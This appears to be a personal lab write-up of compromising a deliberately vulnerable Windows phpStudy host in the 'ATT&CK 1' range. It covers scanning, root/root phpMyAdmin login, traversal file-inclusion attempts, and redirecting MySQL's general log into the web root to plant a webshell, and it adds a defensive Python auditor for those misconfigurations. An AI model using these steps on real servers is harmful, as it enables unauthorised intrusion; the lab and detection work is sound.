ATT&CK 1

wanwan

Environment setup

Changed the passwords to godrun@2019 (except on the Win7 host).

Information gathering

┌──(kali㉿kali)-[~]
└─$ nmap -sV -sT -sC -o nmapinitial 192.168.33.130
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-26 11:54 EDT
Nmap scan report for 192.168.33.130
Host is up (0.00056s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
|_http-title: phpStudy \xE6\x8E\xA2\xE9\x92\x88 2014
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
3306/tcp open mysql MySQL (unauthorized)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.42 seconds

MySQL comes back as "unauthorized".

Connecting to it directly did not work:

┌──(kali㉿kali)-[~]
└─$ mysql -h 192.168.33.130 -P 3306 -u root
ERROR 1130 (HY000): Host '192.168.33.133' is not allowed to connect to this MySQL server

Let's start with port 80.


Run a directory scan:

gobuster dir -u http://192.168.33.133/ -w /usr/share/wordlists/dirb/common.txt -t 100
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.33.130/ -w /usr/share/wordlists/dirb/common.txt -t 100
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.33.130/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/09/26 12:10:36 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 213]
/.htaccess (Status: 403) [Size: 218]
/.htpasswd (Status: 403) [Size: 218]
/com2 (Status: 403) [Size: 213]
/com1 (Status: 403) [Size: 213]
/com3 (Status: 403) [Size: 213]
/con (Status: 403) [Size: 212]
/lpt1 (Status: 403) [Size: 213]
/lpt2 (Status: 403) [Size: 213]
/nul (Status: 403) [Size: 212]
/phpmyadmin (Status: 301) [Size: 241] [--> http://192.168.33.130/phpmyadmin/]
/phpMyAdmin (Status: 301) [Size: 241] [--> http://192.168.33.130/phpMyAdmin/]
/prn (Status: 403) [Size: 212]
/phpinfo.php (Status: 200) [Size: 71392]
/aux (Status: 403) [Size: 212]

===============================================================
2022/09/26 12:10:38 Finished
===============================================================

Only phpMyAdmin looks like a viable target.

Oh right, I just tried root/root and it can connect to the database.

(The interface can be switched to Chinese, not that it matters.)

What can be done once we have it?

  • Read sensitive files, passwords and the like
  • Write a shell?

Oh right, can I change that one setting so that I can write files remotely? (But I would need a directory path?)

A Windows directory? Hmm, that is annoying... wait, I overlooked phpinfo.php.

It leaks the path outright: C:\phpStudy\php\php-5.4.45\php.ini

Let's try writing a file.

Quick review

Checking file-read privileges

show grants for <username>@localhost;

The file must be smaller than max_allowed_packet (the load_file() function is limited by this value).

To check: mysql> show global variables like 'max_allowed%';
To change: mysql> set global max_allowed_packet = 5*1024*1024;


Checking file-write privileges

show global variables like "secure_file_priv";


Reference: "MySQL file read/write", CSDN blog by iO快到碗里来.


Tried attacking phpMyAdmin (failed).

Tried file inclusion; it did not work, not sure why.

?target=db_sql.php%253f/../../../tmp/sess_1v6hitp3cles3aps682pngiff1qvk1ef
?target=db_sql.php%253f/../../tmp/sess_1v6hitp3cles3aps682pngiff1qvk1ef

Did not work...

The session path is visible.


Writing a file via the MySQL general log

show global variables like "%genera%";

set global general_log='on';
SET global general_log_file='C:/phpStudy/WWW/shell.php';

SET global general_log_file='C:/phpStudy/WWW/shell.php';
set global general_log='off';

http://192.168.33.130/exp.php?cmd=system(%27whoami%27);
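The two conditions the notes rely on, an unrestricted secure_file_priv for file reads and a general_log_file that can be pointed into the web root, are exactly what a defender should be auditing and alerting on. The script below is an added example written for this page, not code from the original notes: it takes the output of the SHOW GLOBAL VARIABLES and SHOW GRANTS queries above (as constructed sample dictionaries and rows mirroring the lab's state), flags the risky settings, and scans constructed general-log-style lines for SET general_log_file or INTO OUTFILE statements whose target lands under a web root. The phpStudy web root comes from the path phpinfo.php leaked; the other web roots and the sample log lines are assumptions.

```python
import re

# Web roots to treat as sensitive. C:/phpStudy/WWW is the root the notes
# above target; /var/www/html is an assumed extra root for Linux hosts.
WEB_ROOTS = ("C:/phpStudy/WWW", "/var/www/html")
SCRIPT_EXT = (".php", ".phtml", ".jsp", ".asp", ".aspx")


def _norm(path: str) -> str:
    """Normalize Windows or POSIX paths for a case-insensitive prefix check."""
    return path.replace("\\", "/").rstrip("/").lower()


def under_webroot(path: str, web_roots=WEB_ROOTS) -> bool:
    """True when path is one of the web roots or a descendant of one."""
    p = _norm(path)
    return any(p == _norm(r) or p.startswith(_norm(r) + "/") for r in web_roots)


def audit_variables(variables: dict) -> list:
    """Flag risky values among the variables the notes query with SHOW GLOBAL VARIABLES."""
    findings = []
    sfp = variables.get("secure_file_priv")
    if sfp is None or sfp == "":
        # Empty means LOAD_FILE() / SELECT ... INTO OUTFILE are not confined to a directory.
        findings.append("secure_file_priv is empty: file read/write is unrestricted")
    elif sfp.upper() != "NULL" and under_webroot(sfp):
        findings.append("secure_file_priv points inside a web root: %s" % sfp)
    if variables.get("general_log", "OFF").upper() == "ON":
        log_file = variables.get("general_log_file", "")
        if under_webroot(log_file) or log_file.lower().endswith(SCRIPT_EXT):
            findings.append("general_log is ON and its file is web-reachable: %s" % log_file)
    return findings


# Matches both 'user'@'host' (5.x) and `user`@`host` (8.x) SHOW GRANTS output.
GRANT_RE = re.compile(
    r"GRANT\s+(?P<privs>.+?)\s+ON\s+\S+\s+TO\s+['`](?P<user>[^'`]*)['`]@['`](?P<host>[^'`]*)['`]",
    re.I,
)


def audit_grants(grant_rows: list) -> list:
    """Flag accounts that hold FILE (or ALL PRIVILEGES), especially when reachable from any host."""
    findings = []
    for row in grant_rows:
        m = GRANT_RE.search(row)
        if not m:
            continue
        privs = [p.strip().upper() for p in m.group("privs").split(",")]
        has_file = "ALL PRIVILEGES" in privs or "FILE" in privs
        if not has_file:
            continue
        who = "%s@%s" % (m.group("user"), m.group("host"))
        if m.group("host") in ("%", ""):
            findings.append("%s holds FILE/ALL and may connect from any host" % who)
        else:
            findings.append("%s holds the FILE privilege" % who)
    return findings


LOG_FILE_RE = re.compile(r"SET\s+(?:GLOBAL\s+)?general_log_file\s*=\s*['\"]([^'\"]+)['\"]", re.I)
OUTFILE_RE = re.compile(r"INTO\s+(?:OUT|DUMP)FILE\s+['\"]([^'\"]+)['\"]", re.I)


def suspicious_log_lines(lines: list) -> list:
    """Return (reason, path) for statements that redirect the log or write a file into a web root."""
    hits = []
    for line in lines:
        for rx, reason in ((LOG_FILE_RE, "general_log_file redirected"), (OUTFILE_RE, "INTO OUTFILE")):
            m = rx.search(line)
            if m and (under_webroot(m.group(1)) or m.group(1).lower().endswith(SCRIPT_EXT)):
                hits.append((reason, m.group(1)))
    return hits


# Constructed sample data mirroring the state the notes describe.
SAMPLE_VARIABLES = {
    "secure_file_priv": "",
    "general_log": "ON",
    "general_log_file": "C:/phpStudy/WWW/shell.php",
    "max_allowed_packet": "4194304",
}
SAMPLE_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' WITH GRANT OPTION",
    "GRANT SELECT ON app.* TO 'web'@'localhost'",
]
SAMPLE_LOG = [  # constructed general-log-style lines
    "2022-09-27T01:07:52.000000Z\t8 Query\tshow global variables like \"%genera%\"",
    "2022-09-27T01:07:58.000000Z\t8 Query\tSET global general_log_file='C:/phpStudy/WWW/shell.php'",
    "2022-09-27T01:08:03.000000Z\t8 Query\tselect 1 into outfile '/tmp/export.csv'",
]

if __name__ == "__main__":
    for f in audit_variables(SAMPLE_VARIABLES) + audit_grants(SAMPLE_GRANTS):
        print("[finding]", f)
    for reason, path in suspicious_log_lines(SAMPLE_LOG):
        print("[alert]", reason, "->", path)
```

The hardening that makes each finding go away is the mirror image of the notes: set secure_file_priv to NULL (or a directory outside the web root), leave general_log off unless it is needed and keep general_log_file on a path the web server cannot serve, and do not let an account with FILE or ALL PRIVILEGES connect from '%'. The /tmp/export.csv line is left unflagged on purpose, since the check only cares about targets a web server would serve or execute.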

There is no one-click tool on Linux; will pick this up tomorrow and try 哥斯拉 (Godzilla) or 冰蝎 (Behinder) instead.